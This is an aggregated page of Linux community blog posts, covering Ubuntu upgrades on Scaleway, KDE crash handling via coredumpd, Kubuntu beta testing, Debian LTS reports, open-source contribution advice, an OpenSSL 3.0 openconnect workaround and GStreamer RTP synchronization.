Are you looking for a remote (US, Canada, or Phila) Dev Ops job with a company focused on making a positive impact?

on June 15, 2022 04:00 PM

But what will people download Chrome with now?

Raise a glass, kiss your wife, hug your children. It’s finally gone.

IE11 Logo

It’s dead.

Internet Explorer has been dying for an age. 15 years ago IE6 finally bit it, 8 years ago I was calling for webdevs to hasten the death of IE8 and today is the day that Microsoft has finally pulled regular support for “retired” Internet Explorer 11, last of its name.

Its successor, Edge, uses Chrome’s renderer. While I’m sure we’ll have a long chat about the problems of monocultures one day, this means —for now— we can really focus on modern standards without having to worry about what this 9 year old renderer thinks. And I mean that at a commercial, enterprise level. Use display: grid without fallback code. Use ES6 features without Babel transpiling everything. Go, create something and expect it to just work.

Here’s to never having to download the multi-gigabyte, 90 day Internet Explorer test machine images. Here’s to kicking out swathes of compat code. Here’s to being able to [fairly] rigorously test a website locally without a third party running a dozen versions of Windows.

The web is more free for this. Rejoice! while it lasts.

on June 15, 2022 12:00 AM

June 07, 2022

Hello world!

Salih Emin

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

on June 07, 2022 09:00 AM

June 04, 2022

You have a Scaleway Virtual Private Server (VPS) and you are considering upgrading your installed Linux distribution. Perhaps you have been notified by Scaleway to upgrade an old Linux version. The email asks you to upgrade but does not give you the necessary information on how to upgrade or how to avoid certain pitfalls.

Scaleway email: “Important Notice: End-Of-Life of Your Instance Images”

What could go wrong when you try to upgrade?

A few things can go wrong.

Watch out for Bootscripts

The most important thing that can go wrong is if your VPS is using a bootscript. A bootscript is a fixed way of booting your Linux server, and it includes a generic Scaleway-provided Linux kernel. You would be running Ubuntu, but the Linux kernel would be a common Scaleway kernel shared among all Linux distributions; its config options would be set in stone, and that could cause some issues. That situation has changed, and Scaleway now uses the distributions' own kernels. But since Scaleway sent an email about old Linux versions, you need to check this one out.

To verify, go into the Advanced Settings, under Boot Mode. If it looks as follows, then you are using a bootscript. When you upgrade the Linux version, the Linux kernel will stay the same, as instructed by the bootscript. The proper Boot Mode should be “Use local boot”, so that your VPS is using your distro’s Linux kernel. Fun fact #39192: If you offer Ubuntu to your users but you do not use the Ubuntu kernel, then Canonical does not grant you a (free) right to advertise that you are offering “Ubuntu”, because it’s not really real Ubuntu (the Linux kernel is not a stock Ubuntu Linux kernel). Since around 2019 Scaleway has defaulted to the Use local boot Boot Mode. In my case it was indeed Use local boot, therefore I did not have to deal with bootscripts. I just clicked on Use bootscript for the purposes of this post; I did not apply this change.

Boot Mode in the Scaleway Advanced Settings.

Verify that the console works (Serial console, recovery)

You normally connect to your Linux server using SSH. But what happens if something goes wrong and you lose access, specifically while you are upgrading your Linux installation? You need a separate way, a backup option, to connect back to the server. This is achieved with the Console. It opens up a browser window that gives you access to the Linux console of the server, over the web. It is separate from SSH, therefore if SSH access is not available but the server is still running, you can still get access here. Note that when you upgrade Debian or Ubuntu over SSH with do-release-upgrade, the upgrader creates a screen session that you can detach and attach at will. If you lose SSH access, connect to the Console and attach there.
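
From the Console, reattaching looks something like this (a sketch; session names vary):

$ screen -ls   # the upgrader's screen session shows up here
$ screen -r    # reattach; pass the session name if more than one is listed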

Link to open the Console.

Note two things.

  1. The Console in Scaleway does not work on Firefox. Anything that is based on Chromium should work fine. It is not clear why it does not work. If you place your mouse cursor on the button, it shows Firefox is not currently compatible with the serial console.
  2. Make sure that you know the username and password of your non-root account on your Scaleway server. No, really. You would normally connect with SSH and Public-Key Authentication, and for all you know, the account could be locked. Try it out now and get a shell.

Beware of firewalls and security policies and security groups

When you are upgrading a Debian or Ubuntu distribution over SSH, the installer/upgrader will tell you that it will open a backup SSH server on a different port, like 1022. It will also tell you to open that port if you use a Linux firewall on your server. If you plan to keep that as a backup option, note that Scaleway has a facility called Security Groups that works like a global firewall for your Scaleway servers. That is, you can block access to certain ports if you specify them in the Security Group, and you have assigned those Scaleway servers to that Security Group.

Therefore, if you plan to rely on access to port 1022, make sure that the Security Group does not block it.
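
If you also run ufw on the server itself, opening the fallback port ahead of the upgrade is quick (a sketch; 1022 is the port the upgrader announces):

$ sudo ufw allow 1022/tcp
$ sudo ufw status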

How to avoid having things go wrong?

When you upgrade a Linux distribution, you are asked all sorts of questions along the way. Most likely, the upgrader will ask if you want to keep back a certain configuration file, or if you want to have it replaced by the newer version.

If you are upgrading your Ubuntu server, you would install the ubuntu-release-upgrader-core package and then run do-release-upgrade.

$ sudo apt install ubuntu-release-upgrader-core
...
$ sudo do-release-upgrade
...

To avoid making a mistake here, you can launch a new Scaleway server with that old Linux distro version and perform an upgrade there. By doing so, you will see that you are asked

  1. whether to keep your old SSH configuration or install a new one. Install the new one and make a note to apply later any changes from the old configuration.
  2. whether to be asked specifically which services to restart or let the system do these automatically. You would consider this if the server deals with a lot of traffic.
  3. whether to keep or install the new configuration for the Web server. Most likely you keep the old configuration; otherwise your Web server will not start automatically and you will need to fix the configuration files manually.
  4. whether you want to keep or update grub. AFAIK, grub is not used here, so the answer does not matter.
  5. whether you want to upgrade to the snap package of LXD. If you use LXD, you should have switched already to the snap package of LXD so that you are not asked here. If you do not use LXD, then before the upgrade you should uninstall LXD (the DEB version) so that the upgrade does not install the snap package of LXD. If the installer decides that you must upgrade LXD, you cannot select to skip it; you will get the snap package of LXD.

Here are some relevant screenshots.

You are upgrading over SSH so you are getting an extra SSH server for your safety.
How it looks when you upgrade from a pristine Ubuntu 16.04 to Ubuntu 18.04.
Fast-forward, the upgrade completed and we connect with SSH. We are prompted to upgrade again to the next LTS, Ubuntu 20.04.
How it looks when you upgrade from a pristine Ubuntu 18.04 to Ubuntu 20.04.

Troubleshooting

You have upgraded your server but your WordPress site does not start. Why? Here’s a screenshot.

Error “502 Bad Gateway” from a WordPress website.

A WordPress website requires PHP and normally the PHP package should update automatically. It actually does update automatically. The problem is with the Unix socket for PHP. The Web server (NGINX in our case) needs access to the Unix socket of PHP. In Ubuntu the Unix socket looks like /run/php/php7.4-fpm.sock.

Ubuntu version    Filename for the PHP Unix socket
Ubuntu 16.04      /run/php/php7.0-fpm.sock
Ubuntu 18.04      /run/php/php7.2-fpm.sock
Ubuntu 20.04      /run/php/php7.4-fpm.sock
The filename of the PHP Unix socket per Ubuntu version.

Therefore, you need to open the configuration file for each of your websites and update the PHP socket path to the new filename of the PHP Unix socket. Here is the corrected snippet for Ubuntu 20.04.

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
     include snippets/fastcgi-php.conf;
     #
     # # With php7.0-cgi alone:
     # fastcgi_pass 127.0.0.1:9000;
     # With php7.0-fpm:
     fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}
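
To confirm the right socket name and apply the change safely, something like this should work (a sketch, assuming Ubuntu 20.04 with NGINX):

$ ls /run/php/                  # shows which php*-fpm.sock actually exists
$ sudo nginx -t                 # validate the edited configuration
$ sudo systemctl reload nginx   # apply it without dropping connections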

A request

Scaleway, if you are reading this, please have a look at this feature request.

on June 04, 2022 03:51 PM

May 25, 2022

DrKonqi ❤️ coredumpd

Harald Sitter

Get some popcorn and strap in for a long one! I shall delight you with some insights into crash handling and all that unicorn sparkle material.


Since Plasma 5.24, DrKonqi, Plasma’s infamous crash reporter, has gained support to route crashes through coredumpd, and it is amazing – albeit a bit unused. That is why I’m telling you about it now: it’s matured a bit and is even more amazing – albeit still unused; I hope that will change.

To explain what any of this does I have to explain some basics first, so we are on the same page…

Most applications made by KDE will generally rely on KCrash, a KDE framework that implements crash handling, to, well, handle crashes. The way this works depends a bit on the operating system, but one way or another, when an application encounters a fault it first stops to think for a moment, about the meaning of life and whatever else; we call that “catching the crash”. During that time frame we can apply further diagnostics to help figure out later what went wrong. On POSIX systems specifically, we generate a backtrace and send that off to our bugzilla for handling by a developer – that is in essence the job of DrKonqi.

Currently DrKonqi operates in a mode generally dubbed “just-in-time debugging”. When a crash occurs: KCrash immediately starts DrKonqi, DrKonqi attaches GDB to the still-running process, GDB creates a backtrace, and then DrKonqi sends the trace along with metadata to bugzilla.

Just-in-time debugging is often useful on developer machines because you can easily switch to interactive debugging and also have a more complete picture of the environmental system state. For user systems it is a bit awkward though. You may not have time to deal with the report right now, you may have no internet connection, and indeed the crash may be impossible to trace due to technical complications during just-in-time debugging, owing to how POSIX signals work (threads continue running :O), etc.

In short: just-in-time really shouldn’t be the default.

Enter coredumpd.

Coredumpd is part of systemd and acts as the kernel’s core handler. Ah, that’s a mouthful again. Let’s backtrace (pun intended)… earlier, when I was talking about KCrash, I only told part of the story. When a fault occurs it doesn’t necessarily mean that the application has to crash; it could also neatly exit. It is only when the application takes no further action to alleviate the problem that the Linux kernel will jump in and do some rudimentary crash handling, forcefully. Very rudimentary indeed: it simply takes the memory state of the process and dumps it into a file. This is then aptly called a core dump. It’s kind of like a snapshot of the state of the process when the fault occurred, and it allows for debugging after the fact. Now things get interesting, don’t they? 🙂

So… KCrash can simply do nothing and let the Linux kernel do the work, and the Linux kernel can also be lazy and delegate the work to a so-called core handler, an application that handles the core dumping. Well, here we are. That core handler can be coredumpd, making it the effective crash handler.

What’s the point you ask? — We get to be lazy!

Also, core dumping has one huge advantage that also is its disadvantage (depending on how you look at it): when a core dumps, the process is no longer running. When backtracing a core dump you are looking at a snapshot of the past, not a still running process. That means you can deal with crashes now or in 5 minutes or in 10 hours. So long as the core dump is available on disk you can trace the cause of the crash. This is further improved by coredumpd also storing a whole lot of metadata in journald. All put together it allows us to run drkonqi after-the-fact, instead of just-in-time. Amazing! I’m sure you will agree.

For the user everything looks the same, but under the hood we’ve gotten rid of various race conditions and gotten crash persistence across reboots for free!

Among other things this gives us the ability to look at past crashes; a GUI for this will be included in Plasma 5.25. Future plans also include the ability to file bug reports long after the fact.
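
In the meantime, the stored dumps are already inspectable with coredumpd’s own tooling, independently of DrKonqi; a quick sketch (the process name is only an example):

coredumpctl list               # every crash coredumpd has recorded
coredumpctl info plasmashell   # stored metadata for the latest crash of that process
coredumpctl gdb plasmashell    # load the stored core straight into gdb, after the fact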

Inner Workings

The way this works behind the scenes is somewhat complicated but should be easy enough to follow:

  • The application produces a fault
  • KCrash writes KCrash-specific metadata into a file on disk and doesn’t exit
  • The kernel issues a core dump via coredumpd
  • The systemd unit coredump@ starts
  • At the same time drkonqi-coredump-processor@ starts
  • The processor@ waits for coredump@ to finish its task of dumping the core
  • The processor@ starts drkonqi-coredump-launcher@ in user scope
  • launcher@ starts DrKonqi with the same arguments as though it had been started just-in-time
  • DrKonqi assembles all the data to produce a crash report
  • the user is greeted by a crash notification just like just-in-time debugging
  • the entire crash reporting procedure is the same

Use It!

If you are using KDE neon unstable edition, you have already been using coredumpd-based crash reporting for months! You haven’t even noticed, have you? 😉

If not, here’s your chance to join the after-the-fact club of cool kids. Simply set

KCRASH_DUMP_ONLY=1

in your `/etc/environment` and make sure your distribution has enabled the relevant systemd units accordingly.

on May 25, 2022 07:59 PM

May 22, 2022

Small EInk Phone

Bryan Quigley

Aside, 2022-05-22: it's not the same, but there is a renewed push by Pebble creator Eric Migicovsky to show demand for a SmallAndroidPhone. It's currently at about 29,000.

Update 2022-02-26: Only got 12 responses which likely means there isn't that much demand for this product at this time (or it wasn't interesting enough to spread). Here are the results as promised:

What's the most you would be willing to spend on this? 7 said $200, 4 said $400. But that doesn't quite capture it: some wanted even cheaper than $200 (which isn't doable), and others were willing to spend a lot more.

Of the priorities that got at least 2 people agreeing (ignoring rating):

  • 4 votes: Openness of components, Software investments
  • 3 votes: Better modem, Headphone jack, Cheaper price
  • 2 votes: Convergence capable, Color eInk, Replaceable battery

I'd guess about half of the respondents would likely be happy with a PinePhone (Pro) that got better battery life and "Just Works".

End Update.

Would you be interested in crowdfunding a small E Ink Open Phone? If yes, check out the specs and fill out the form below.

If I get 1000 interested people, I'll approach manufacturers. I plan to share the results publicly in either case. I will never share your information with manufacturers, but I will contact you by email if this goes forward.

Basics:

  • Small sized for 2021 (somewhere between 4.5 - 5.2 inches)
  • E Ink screen (Maybe Color) - battery life over playing videos/games
  • To be shipped with one of the main Linux phone OSes (Manjaro with KDE Plasma, etc).
  • Low to moderate hardware specs
  • Likely >6 months from purchase to getting device

Minimum goal specs (we might be able to do much better than these, but again might not):

  • 4 Core
  • 32 GB Storage
  • USB Type-C (Not necessarily display out capable)
  • ~8 MP Front camera
  • GPS
  • GSM Modem (US)

Software Goals:

  • Only open source apps pre-installed
  • MMS/SMS
  • Phone calls
  • View websites / webapps including at least 1 rideshare/taxi service working (may not be official)
  • 2 day battery life (during "normal" usage)

Discussions: Phoronix

on May 22, 2022 04:30 AM

May 20, 2022

Are you using Kubuntu 22.04 Jammy Jellyfish, our current Stable release? Or are you already running our development builds of the upcoming 22.10 Kinetic Kudu?

We currently have Plasma 5.24.90 (Plasma 5.25 Beta) available in our Beta PPA for Kubuntu 22.04, and in the Ubuntu archive and daily ISO build for the 22.10 development series.

However this is a beta release, and we should re-iterate the disclaimer from the upstream release announcement:

DISCLAIMER: Today we are bringing you the preview version of KDE’s Plasma 5.25 desktop release. Plasma 5.25 Beta is aimed at testers, developers, and bug-hunters. To help KDE developers iron out bugs and solve issues, install Plasma 5.25 Beta and test run the features listed below. Please report bugs to our bug tracker. We will be holding a Plasma 5.25 beta review day on May 26 (details will be published on our social media) and you can join us for a day of bug-hunting, triaging and solving alongside the Plasma devs! The final version of Plasma 5.25 will become available for the general public on the 14th of June.

DISCLAIMER: This release contains untested and unstable software. It is highly recommended you do not use this version in a production environment and do not use it as your daily work environment. You risk crashes and loss of data.

https://kde.org/announcements/plasma/5/5.24.90

Testers of the Kubuntu 22.10 Kinetic Kudu development series:

Testers with a current install can simply upgrade their packages to install the 5.25 Beta.

Alternatively, a live/install image is available at: http://cdimage.ubuntu.com/kubuntu/daily-live/current/

Users on Kubuntu 22.04 Jammy Jellyfish:

5.25 Beta packages and required dependencies are available in our Beta PPA.

The PPA should work whether you are currently using our backports PPA or not.

If you are prepared to test via the PPA, then…..

Add the beta PPA and then upgrade:

sudo add-apt-repository ppa:kubuntu-ppa/beta && sudo apt full-upgrade -y

Then reboot.

In case of issues, testers should be prepared to use ppa-purge to remove the PPA and revert/downgrade packages.
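
That revert would look something like this (a sketch):

sudo apt install ppa-purge
sudo ppa-purge ppa:kubuntu-ppa/beta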

Kubuntu is part of the KDE community, so this testing will benefit both Kubuntu as well as upstream KDE Plasma software, which is used by many other distributions too.

  • If you believe you might have found a packaging bug, you can use launchpad.net to post testing feedback to the Kubuntu team as a bug, or give feedback on IRC [1], or mailing lists [2].
  • If you believe you have found a bug in the underlying software, then bugs.kde.org is the best place to file your bug report.

Please review the release announcement and changelog.

[Test Case]
* General tests:
– Does plasma desktop start as normal with no apparent regressions over 5.24?
– General workflow – testers should carry out their normal tasks, using the plasma features they normally do, and test common subsystems such as audio, settings changes, compositing, desktop effects, suspend, etc.
* Specific tests:
– Check the changelog:
– Identify items with front/user facing changes capable of specific testing.
– Test the ‘fixed’ functionality or ‘new’ feature.

Testing may involve some technical set up, so while you do not need to be a highly advanced K/Ubuntu user, some proficiency in apt-based package management is advisable.

Testing is very important to the quality of the software Ubuntu and Kubuntu developers package and release.

We need your help to get this important beta release in shape for Kubuntu and the KDE community as a whole.

Thanks!

Please stop by the Kubuntu-devel IRC channel on libera.chat if you need clarification of any of the steps to follow.

[1] – #kubuntu-devel on libera.chat
[2] – https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel

on May 20, 2022 05:06 PM

May 10, 2022

Here’s my (thirty-second) monthly but brief update about the activities I’ve done in the F/L/OSS world.

Debian

This was my 41st month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions and things around bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.

Ubuntu

This was my 16th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D


Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-second month as a Debian LTS and twenty-third month as a Debian ELTS paid contributor.
I worked for 35.00 hours for LTS and 30.00 hours for ELTS.

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Triaged cifs-utils, vim, elog, needrestart, amd64-microcode, libgoogle-gson-java, lrzip, and mutt.
  • Started as a Freexian Collaborator! \o/
  • Read through the documentation bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • Participated and helped fellow members with their queries via private mail and chat.
  • General and other discussions on LTS private and public mailing list.

Debian LTS Survey

I’ve spent 2 hours on the LTS survey on the following bits:

  • Finalizing and wrapping up the survey.
  • Providing the stats, working on the initial export of the survey.
  • Dropping ghost entries and other things which are useless. :)

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

Here’s my (thirty-first) monthly but brief update about the activities I’ve done in the F/L/OSS world.

Debian

This was my 40th month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

  • Helped Andrius w/ FTBFS for php-text-captcha, reported via #977403.
    • I fixed the same in Ubuntu a couple of months ago and they copied over the patch here.

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions of referees and attendees around bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.

Ubuntu

This was my 15th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D


Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-first month as a Debian LTS and twentieth month as a Debian ELTS paid contributor.
I worked for 23.25 hours for LTS and 20.00 hours for ELTS.

LTS CVE Fixes and Announcements:

  • Issued DLA 2976-1, fixing CVE-2022-1271, for gzip.
    For Debian 9 stretch, these problems have been fixed in version 1.6-5+deb9u1.
  • Issued DLA 2977-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 9 stretch, these problems have been fixed in version 5.2.2-1.2+deb9u1.
  • Working on src:tiff and src:mbedtls to fix the issues, still waiting for more issues to be reported, though.
  • Looking at src:mutt CVEs. Haven’t had the time to complete but shall roll out next month.

ELTS CVE Fixes and Announcements:

  • Issued ELA 593-1, fixing CVE-2022-1271, for gzip.
    For Debian 8 jessie, these problems have been fixed in version 1.6-4+deb8u1.
  • Issued ELA 594-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 8 jessie, these problems have been fixed in version 5.1.1alpha+20120614-2+deb8u1.
  • Issued ELA 598-1, fixing CVE-2019-16935, CVE-2021-3177, and CVE-2021-4189, for python2.7.
    For Debian 8 jessie, these problems have been fixed in version 2.7.9-2-ds1-1+deb8u9.
  • Working on src:tiff and src:beep to fix the issues; still waiting for more issues to be reported for src:tiff, and src:beep is a bit of a PITA, though. :)

Other (E)LTS Work:

  • Triaged gzip, xz-utils, tiff, beep, python2.7, python-django, and libgit2.
  • Signed up to be a Freexian Collaborator! \o/
  • Read through some bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.
  • Attended monthly Debian meeting. Held on Jitsi this month.

Debian LTS Survey

I’ve spent 18 hours on the LTS survey on the following bits:

  • Rolled out the announcement. Started the survey.
  • Answered a bunch of queries, people asked via e-mail.
  • Looked at another bunch of tickets: https://salsa.debian.org/freexian-team/project-funding/-/issues/23.
  • Sent a reminder and fixed a few things here and there.
  • Gave a status update during the meeting.
  • Extended the duration of the survey.

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

May 04, 2022

Contributing to any open-source project is a great way to spend a few hours each month. I started more than 10 years ago, and it has ultimately shaped my career in ways I couldn’t have imagined!

GitLab logo as cover

The new GitLab logo, just announced on the 27th April 2022.

Nowadays, my contributions focus mostly on GitLab, so you will see many references to it in this blog post, but the content is quite generalizable; I would like to share my experience to highlight why you should consider contributing to an open-source project.

Writing blog posts, tweeting, and helping foster the community are nice ways to contribute to a project ;-)

And contributing doesn’t mean only coding: there are countless ways to help an open-source project: translating it to different languages, reporting issues, designing new features, writing the documentation, offering support on forums and StackOverflow, and so on.

Before diving deep into this wall of text, be aware there are mainly three parts in this blog post after this introduction: a context section, where I describe my personal experience with open source and what it means to me; then a nice list of reasons to contribute to any project; and, in closing, some tips on how to start contributing, both in general and specific to GitLab.

Context

Ten years ago, I was fresh out of high school, without (almost) any knowledge about IT: however, I found out that I had a massive passion for it, so I enrolled in a Computer Engineering university (boring!), and I started contributing to Ubuntu (cool!). I began with the Italian Local Community, and I soon moved to Ubuntu Touch.

I often considered rewriting that old article; however, I have a strange attachment to it as it is, with all those English mistakes. It was one of the first blog posts I had written, and it was really well received! We all know how it ended, but it still was a fantastic ride, with a lot of great moments: just take a look at the archive of this blog, and you can see the passion and the enthusiasm I had. I was so enthusiastic that I wrote a blog post similar to this one! I think it highlights really well the considerable differences 10 years make.

Back then, I wasn’t working, just studying, so I had a lot of spare time. My English was way worse. I was at the beginning of my journey in the computer world, and Ubuntu ultimately shaped a big part of it. My knowledge was very limited, and I had never worked before. Contributing to Ubuntu gave me a glimpse of the real world; I met outstanding engineers who taught me a lot, and it boosted my CV, helping me land my first job.

Advocacy, as in this blog post, is a great way to contribute! You spread awareness, and this helps find new contributors, and maybe inspires some young student to try it out! Since then, I completed a master’s degree in C.S., worked at different companies in three different countries, and became a professional. Nowadays, my contributions to open source are more sporadic (adulthood, yay), but given how much it meant to me, I am still a big fan, and I try to contribute when I can, and how I can.

Why contributing

Friends

During my years contributing to open-source software, I’ve met countless incredible people, with some of whom I’ve become friends. In the old blog post I mentioned David: in the last 9 years we have stayed in touch and met on different occasions in different cities; the last time was as recent as last summer. Back at the time, he was a Manager in the Ubuntu Community Team at Canonical; then, he became Director of Community Relations at GitLab. Small world!

The Ubuntu Touch Community Team in Malta, in 2014

The Ubuntu Touch Community Team in Malta, in 2014. It has been an incredible week, sponsored by Canonical!

One interesting thing is that people contribute to open-source projects from their homes, all around the world: when I travel, I usually know somebody living in my destination city, so I always have at least one night booked for a beer with somebody I’ve met only online; it’s a pleasure to speak with people from different backgrounds and get a glimpse into their lives, all united by one common passion.

Fun

Having fun is important! You cannot spend your leisure time getting bored or annoyed: contributing to open source is fun ‘cause you pick the problems you would like to work on, and you don’t need all the bureaucracy and meetings that are often part of your daily job. You can be challenged, feel useful, and improve a product, without any manager on your shoulder, and at your own pace.

Being up-to-date on how things evolve

For example, the GitLab Handbook is a precious collection of resources, ideas, and methodologies on how to run a 1000 people company in a transparent, full remote, way. It’s a great reading, with a lot of wisdom.

Contributing to a project typically gives you an idea of how the teams behind it work, which technologies they use, and which methodologies. Many open-source projects use bleeding-edge technologies, or draw the path forward. Being in contact with new ideas is a great way to know where the industry is headed, and what the latest news is: this is especially true if you hang out in the channels where the community meets, be they Discord, forums, or IRC (well, IRC is not really bleeding-edge, but it is fun).

Learning

When contributing in an area that doesn’t match your expertise, you always learn something new: reviews are usually precise and on point, and projects of a remarkable size commonly have a coaching team that helps you start contributing and guides you on how to land your first patches.

At GitLab, if you need help merging your code, there are the Merge Request Coaches! And for any kind of help, you can always join Gitter, ask on the forum, or write to the dedicated email address.

Also, feel free to ping me directly if you want some general guidance!

Giving back

I work as a Platform Engineer. My job is built on an incredible number of open-source libraries and amazing FOSS services; I basically just have to glue different pieces together. When I find some rough edge that could be improved, I try to do so.

Nowadays, I find well-maintained documentation crucial, so after I have achieved something complex, I usually go back and try to improve the documentation where it is lacking. It is my tiny way of saying thanks, and of giving back to a world that has really shaped my career.

This is also what most of my blog posts are about: after completing something I spent real effort on, I find it nice to be able to share that information. Every so often, I find myself years later following my own guide, and I really appreciate it when other people find the content useful too.

Swag

Who doesn’t like swag? :-) Numerous projects have delightful swag, starting with stickers, that they like to share with the whole community. Of course, it shouldn’t be your main driver, ‘cause you will soon notice that it is ultimately not worth the amount of time you spend contributing, but it is charming to have GitLab socks!

A GitLab-branded mechanical keyboard, courtesy of GitLab's security team! This very article was typed on it!

Tips

I hope I inspired you to contribute to some open-source project (maybe GitLab!). Now, let’s go over some small tricks for getting started easily.

Find something you are passionate about

You must find a project you are passionate about, and that you use frequently. Looking forward to a release, knowing that your contributions will be included, is a wonderful satisfaction, and it can really push you to do more.

Moreover, if you already know the project you want to contribute to, you probably already know its biggest pain points, and where the project needs some contributions.

Start small and easy

You don’t need to make gigantic contributions to begin. Find something tiny, so you can get familiar with the project’s workflows and with how contributions are received.

Launchpad and Bazaar instead of GitLab and Git — down memory lane! My journey with Ubuntu started with correcting a typo in a README, and here I am, years later, having contributed to dozens of projects and built a career in the C.S. field. Back then, I really had no idea what my future would hold.

For GitLab, you can take a look at the issues marked as “good for new contributors”. They are designed to be addressed quickly and to onboard new people into the community. This way, you don’t have to focus on the difficulty of the task at hand, and can easily explore how the community works.

Writing issues is a good start

Writing high-quality issues is a great way to start contributing: the maintainers of a project are not always aware of how the software is used, and cannot be aware of all the issues. If you know that something could be improved, write it down: spend some time explaining what happens, what you expect, and how to reproduce the problem, and maybe suggest some solutions as well! Perhaps the first issue you write down will be the very first issue you resolve.

Not much time required!

Contributing to a project doesn’t necessarily require a lot of time. When I was younger, I definitely dedicated way more time to open-source projects, implementing gigantic features. Nowadays, I don’t do that anymore (life is much more than computers), but I like to think that my contributions are still useful. Still, I don’t spend more than a couple of hours a month, depending on my schedule, and on how much it rains (yep, in winter I definitely contribute more than in summer).

GitLab is super easy

Do you use GitLab? Then you should undoubtedly try to contribute to it. It is easy, it is fun, and there are many ways to do it. Take a look at this guide, hang out on Gitter, and see you around. ;-)

Next week (9th-13th May 2022) there is also a GitLab Hackathon! It is a really fun and easy way to start contributing: many people are available to help you, there are video sessions about contributing, and just by making a small contribution you will receive a pretty prize.

And if I was able to do it with my few contributions, you can too! In time, if you are consistent in your contributions, you can become a GitLab Hero! How cool is that?

I really hope this wall of text made you consider contributing to an open-source project. If you have any questions or feedback, or if you would like some help, please leave a comment below, tweet me @rpadovani93, or write me an email at hello@rpadovani.com.

Ciao,
R.

on May 04, 2022 12:00 AM

May 02, 2022

Sorry, I should have posted this weeks ago to save others some time.

If you are running openconnect-sso to connect to a Cisco anyconnect VPN, then when you upgrade to Ubuntu Jammy, openssl 3.0 may stop openconnect from working. The easiest way to work around this is to use a custom configuration file as follows:


cat > $HOME/ssl.cnf << EOF
openssl_conf = openssl_init

[openssl_init]
ssl_conf = ssl_sect

[ssl_sect]
system_default = system_default_sect

[system_default_sect]
Options = UnsafeLegacyRenegotiation
EOF

Then use this configuration file (only) when running openconnect:


OPENSSL_CONF=~/ssl.cnf openconnect-sso --server=your-server.whatever.com
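If you connect often, a shell alias saves retyping the variable. This is just a convenience sketch, reusing the placeholder server name from above:

# Hypothetical alias; put it in ~/.bashrc or ~/.zshrc and adjust the server name.
alias vpn-sso='OPENSSL_CONF=$HOME/ssl.cnf openconnect-sso --server=your-server.whatever.com'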

on May 02, 2022 02:39 PM

Over the last few weeks, GStreamer’s RTP stack got a couple of new and quite useful features. As they can be difficult to configure, mostly because there are so many different possible configurations, I decided to write about them a bit with some example code.

The features are RFC 6051-style rapid synchronization of RTP streams, which can be used for inter-stream (e.g. audio/video) synchronization as well as inter-device (i.e. network) synchronization, and the ability to easily retrieve absolute sender clock times per packet on the receiver side.

Note that each of these was already possible with GStreamer before, via different mechanisms with different trade-offs. Obviously, not having working audio/video synchronization would simply not be acceptable, and I have previously talked about how to do inter-device synchronization with GStreamer, for example at the GStreamer Conference 2015 in Düsseldorf.

The example code below makes use of the GStreamer RTSP Server library but can be applied to any kind of RTP workflow, including WebRTC. It is written in Rust, but the same can also be achieved in any other language. The full code can be found in this repository.

And for reference, the merge requests to enable all this are [1], [2] and [3]. You probably don’t want to backport those to an older version of GStreamer though as there are dependencies on various other changes elsewhere. All of the following needs at least GStreamer from the git main branch as of today, or the upcoming 1.22 release.

Baseline Sender / Receiver Code

The starting point of the example code can be found here in the baseline branch. All the important steps are commented so it should be relatively self-explanatory.

Sender

The sender is starting an RTSP server on the local machine on port 8554 and provides a media with H264 video and Opus audio on the mount point /test. It can be started with

$ cargo run -p rtp-rapid-sync-example-send

After starting the server it can be accessed via GStreamer with e.g. gst-play-1.0 rtsp://127.0.0.1:8554/test or similarly via VLC or any other software that supports RTSP.

This does not do anything special yet but lays the foundation for the following steps. It creates an RTSP server instance with a custom RTSP media factory, which in turn creates custom RTSP media instances. All this is not needed at this point yet but will allow for the necessary customization later.

One important aspect here is that the base time of the media’s pipeline is set to zero

pipeline.set_base_time(gst::ClockTime::ZERO);
pipeline.set_start_time(gst::ClockTime::NONE);

This allows the timeoverlay element that is placed in the video part of the pipeline to render the clock time over the video frames. We’re going to use this later to confirm on the receiver that the clock time on the sender and the one retrieved on the receiver are the same.

